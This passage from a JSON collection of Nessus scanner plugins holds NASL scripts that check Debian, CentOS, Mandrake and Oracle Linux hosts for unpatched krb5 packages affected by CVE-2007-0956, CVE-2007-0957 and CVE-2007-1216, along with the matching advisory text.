attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0957\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2007/dsa-1276\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Kerberos packages.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.3.6-2sarge4.\n\nFor the upcoming stable distribution (etch) these problems have been\nfixed in version 1.4.4-7etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"krb5-admin-server\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-clients\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-doc\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-ftpd\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-kdc\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-rsh-server\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-telnetd\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-user\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkadm55\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkrb5-dev\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkrb53\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-admin-server\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-clients\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-doc\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-ftpd\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-kdc\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-rsh-server\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-telnetd\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-user\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libkadm55\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libkrb5-dbg\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libkrb5-dev\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libkrb53\", reference:\"1.4.4-7etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:59:08", "description": "Updated krb5 packages that fix a number of issues are now available.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nKerberos is a network authentication system which allows clients and servers to authenticate to each other through use of symmetric encryption and a trusted third party, the KDC.\n\nA flaw was found in the username handling of the MIT krb5 telnet daemon (telnetd). A remote attacker who can access the telnet port of a target machine could log in as root without requiring a password.\n(CVE-2007-0956)\n\nNote that the krb5 telnet daemon is not enabled by default in any version of Red Hat Enterprise Linux. In addition, the default firewall rules block remote access to the telnet port. This flaw does not affect the telnet daemon distributed in the telnet-server package.\n\nFor users who have enabled the krb5 telnet daemon and have it accessible remotely, this update should be applied immediately.\n\nWhilst we are not aware at this time that the flaw is being actively exploited, we have confirmed that the flaw is very easily exploitable.\n\nThis update also fixes two additional security issues :\n\nBuffer overflows were found which affect the Kerberos KDC and the kadmin server daemon. A remote attacker who can access the KDC could exploit this bug to run arbitrary code with the privileges of the KDC or kadmin server processes. (CVE-2007-0957)\n\nA double-free flaw was found in the GSSAPI library used by the kadmin server daemon. Red Hat Enterprise Linux 4 and 5 contain checks within glibc that detect double-free flaws. Therefore, on Red Hat Enterprise Linux 4 and 5 successful exploitation of this issue can only lead to a denial of service. Applications which use this library in earlier releases of Red Hat Enterprise Linux may also be affected.\n(CVE-2007-1216)\n\nAll users are advised to update to these erratum packages which contain a backported fix to correct these issues.\n\nRed Hat would like to thank MIT and iDefense for reporting these vulnerabilities.", "cvss3": {}, "published": "2007-04-05T00:00:00", "type": "nessus", "title": "CentOS 3 / 4 : krb5 (CESA-2007:0095)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:krb5-devel", "p-cpe:/a:centos:centos:krb5-libs", "p-cpe:/a:centos:centos:krb5-server", "p-cpe:/a:centos:centos:krb5-workstation", "cpe:/o:centos:centos:3", "cpe:/o:centos:centos:4"], "id": "CENTOS_RHSA-2007-0095.NASL", "href": "https://www.tenable.com/plugins/nessus/24919", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0095 and \n# CentOS Errata and Security Advisory 2007:0095 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24919);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_bugtraq_id(23281, 23282, 23285);\n script_xref(name:\"RHSA\", value:\"2007:0095\");\n\n script_name(english:\"CentOS 3 / 4 : krb5 (CESA-2007:0095)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated krb5 packages that fix a number of issues are now available.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nKerberos is a network authentication system which allows clients and\nservers to authenticate to each other through use of symmetric\nencryption and a trusted third party, the KDC.\n\nA flaw was found in the username handling of the MIT krb5 telnet\ndaemon (telnetd). A remote attacker who can access the telnet port of\na target machine could log in as root without requiring a password.\n(CVE-2007-0956)\n\nNote that the krb5 telnet daemon is not enabled by default in any\nversion of Red Hat Enterprise Linux. In addition, the default firewall\nrules block remote access to the telnet port. This flaw does not\naffect the telnet daemon distributed in the telnet-server package.\n\nFor users who have enabled the krb5 telnet daemon and have it\naccessible remotely, this update should be applied immediately.\n\nWhilst we are not aware at this time that the flaw is being actively\nexploited, we have confirmed that the flaw is very easily exploitable.\n\nThis update also fixes two additional security issues :\n\nBuffer overflows were found which affect the Kerberos KDC and the\nkadmin server daemon. A remote attacker who can access the KDC could\nexploit this bug to run arbitrary code with the privileges of the KDC\nor kadmin server processes. (CVE-2007-0957)\n\nA double-free flaw was found in the GSSAPI library used by the kadmin\nserver daemon. Red Hat Enterprise Linux 4 and 5 contain checks within\nglibc that detect double-free flaws. Therefore, on Red Hat Enterprise\nLinux 4 and 5 successful exploitation of this issue can only lead to a\ndenial of service. Applications which use this library in earlier\nreleases of Red Hat Enterprise Linux may also be affected.\n(CVE-2007-1216)\n\nAll users are advised to update to these erratum packages which\ncontain a backported fix to correct these issues.\n\nRed Hat would like to thank MIT and iDefense for reporting these\nvulnerabilities.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013638.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5aa5d1e6\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013639.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e4656c7f\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013642.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?84f46e52\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013645.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c04ec56e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013656.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a718abc3\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013657.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f1929be5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected krb5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"krb5-devel-1.2.7-61\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"krb5-libs-1.2.7-61\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"krb5-server-1.2.7-61\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"krb5-workstation-1.2.7-61\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-devel-1.3.4-46\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-libs-1.3.4-46\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-server-1.3.4-46\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-workstation-1.3.4-46\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-devel / krb5-libs / krb5-server / krb5-workstation\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:59:05", "description": "A vulnerability was found in the username handling of the MIT krb5 telnet daemon. A remote attacker that could access the telnet port of a target machine could login as root without requiring a password (CVE-2007-0956).\n\nBuffer overflows in the kadmin server daemon were discovered that could be exploited by a remote attacker able to access the KDC.\nSuccessful exploitation could allow for the execution of arbitrary code with the privileges of the KDC or kadmin server processes (CVE-2007-0957).\n\nFinally, a double-free flaw was discovered in the GSSAPI library used by the kadmin server daemon, which could lead to a denial of service condition or the execution of arbitrary code with the privileges of the KDC or kadmin server processes (CVE-2007-1216).\n\nUpdated packages have been patched to address this issue.\n\nUpdate :\n\nPackages for Mandriva Linux 2007.1 are now available.", "cvss3": {}, "published": "2007-04-05T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : krb5 (MDKSA-2007:077-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2007.1", "p-cpe:/a:mandriva:linux:ftp-client-krb5", "p-cpe:/a:mandriva:linux:ftp-server-krb5", "p-cpe:/a:mandriva:linux:krb5-server", "p-cpe:/a:mandriva:linux:krb5-workstation", "p-cpe:/a:mandriva:linux:telnet-client-krb5", "p-cpe:/a:mandriva:linux:telnet-server-krb5", "p-cpe:/a:mandriva:linux:lib64krb53", "p-cpe:/a:mandriva:linux:lib64krb53-devel", "p-cpe:/a:mandriva:linux:libkrb53", "p-cpe:/a:mandriva:linux:libkrb53-devel"], "id": "MANDRAKE_MDKSA-2007-077.NASL", "href": "https://www.tenable.com/plugins/nessus/24943", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:077. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24943);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_bugtraq_id(23281, 23282, 23285);\n script_xref(name:\"MDKSA\", value:\"2007:077-1\");\n\n script_name(english:\"Mandrake Linux Security Advisory : krb5 (MDKSA-2007:077-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was found in the username handling of the MIT krb5\ntelnet daemon. A remote attacker that could access the telnet port of\na target machine could login as root without requiring a password\n(CVE-2007-0956).\n\nBuffer overflows in the kadmin server daemon were discovered that\ncould be exploited by a remote attacker able to access the KDC.\nSuccessful exploitation could allow for the execution of arbitrary\ncode with the privileges of the KDC or kadmin server processes\n(CVE-2007-0957).\n\nFinally, a double-free flaw was discovered in the GSSAPI library used\nby the kadmin server daemon, which could lead to a denial of service\ncondition or the execution of arbitrary code with the privileges of\nthe KDC or kadmin server processes (CVE-2007-1216).\n\nUpdated packages have been patched to address this issue.\n\nUpdate :\n\nPackages for Mandriva Linux 2007.1 are now available.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-003.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ftp-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ftp-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64krb53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64krb53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libkrb53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libkrb53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.1\", reference:\"ftp-client-krb5-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"ftp-server-krb5-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"krb5-server-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"krb5-workstation-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64krb53-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64krb53-devel-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libkrb53-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libkrb53-devel-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"telnet-client-krb5-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"telnet-server-krb5-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:25:36", "description": "From Red Hat Security Advisory 2007:0095 :\n\nUpdated krb5 packages that fix a number of issues are now available.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nKerberos is a network authentication system which allows clients and servers to authenticate to each other through use of symmetric encryption and a trusted third party, the KDC.\n\nA flaw was found in the username handling of the MIT krb5 telnet daemon (telnetd). A remote attacker who can access the telnet port of a target machine could log in as root without requiring a password.\n(CVE-2007-0956)\n\nNote that the krb5 telnet daemon is not enabled by default in any version of Red Hat Enterprise Linux. In addition, the default firewall rules block remote access to the telnet port. This flaw does not affect the telnet daemon distributed in the telnet-server package.\n\nFor users who have enabled the krb5 telnet daemon and have it accessible remotely, this update should be applied immediately.\n\nWhilst we are not aware at this time that the flaw is being actively exploited, we have confirmed that the flaw is very easily exploitable.\n\nThis update also fixes two additional security issues :\n\nBuffer overflows were found which affect the Kerberos KDC and the kadmin server daemon. A remote attacker who can access the KDC could exploit this bug to run arbitrary code with the privileges of the KDC or kadmin server processes. (CVE-2007-0957)\n\nA double-free flaw was found in the GSSAPI library used by the kadmin server daemon. Red Hat Enterprise Linux 4 and 5 contain checks within glibc that detect double-free flaws. Therefore, on Red Hat Enterprise Linux 4 and 5 successful exploitation of this issue can only lead to a denial of service. Applications which use this library in earlier releases of Red Hat Enterprise Linux may also be affected.\n(CVE-2007-1216)\n\nAll users are advised to update to these erratum packages which contain a backported fix to correct these issues.\n\nRed Hat would like to thank MIT and iDefense for reporting these vulnerabilities.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 3 / 4 / 5 : krb5 (ELSA-2007-0095)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:krb5-devel", "p-cpe:/a:oracle:linux:krb5-libs", "p-cpe:/a:oracle:linux:krb5-server", "p-cpe:/a:oracle:linux:krb5-workstation", "cpe:/o:oracle:linux:3", "cpe:/o:oracle:linux:4", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2007-0095.NASL", "href": "https://www.tenable.com/plugins/nessus/67458", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:0095 and \n# Oracle Linux Security Advisory ELSA-2007-0095 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67458);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_bugtraq_id(23281, 23282, 23285);\n script_xref(name:\"RHSA\", value:\"2007:0095\");\n\n script_name(english:\"Oracle Linux 3 / 4 / 5 : krb5 (ELSA-2007-0095)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:0095 :\n\nUpdated krb5 packages that fix a number of issues are now available.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nKerberos is a network authentication system which allows clients and\nservers to authenticate to each other through use of symmetric\nencryption and a trusted third party, the KDC.\n\nA flaw was found in the username handling of the MIT krb5 telnet\ndaemon (telnetd). A remote attacker who can access the telnet port of\na target machine could log in as root without requiring a password.\n(CVE-2007-0956)\n\nNote that the krb5 telnet daemon is not enabled by default in any\nversion of Red Hat Enterprise Linux. In addition, the default firewall\nrules block remote access to the telnet port. This flaw does not\naffect the telnet daemon distributed in the telnet-server package.\n\nFor users who have enabled the krb5 telnet daemon and have it\naccessible remotely, this update should be applied immediately.\n\nWhilst we are not aware at this time that the flaw is being actively\nexploited, we have confirmed that the flaw is very easily exploitable.\n\nThis update also fixes two additional security issues :\n\nBuffer overflows were found which affect the Kerberos KDC and the\nkadmin server daemon. A remote attacker who can access the KDC could\nexploit this bug to run arbitrary code with the privileges of the KDC\nor kadmin server processes. (CVE-2007-0957)\n\nA double-free flaw was found in the GSSAPI library used by the kadmin\nserver daemon. Red Hat Enterprise Linux 4 and 5 contain checks within\nglibc that detect double-free flaws. Therefore, on Red Hat Enterprise\nLinux 4 and 5 successful exploitation of this issue can only lead to a\ndenial of service. Applications which use this library in earlier\nreleases of Red Hat Enterprise Linux may also be affected.\n(CVE-2007-1216)\n\nAll users are advised to update to these erratum packages which\ncontain a backported fix to correct these issues.\n\nRed Hat would like to thank MIT and iDefense for reporting these\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-April/000111.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-April/000113.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-June/000237.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected krb5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", 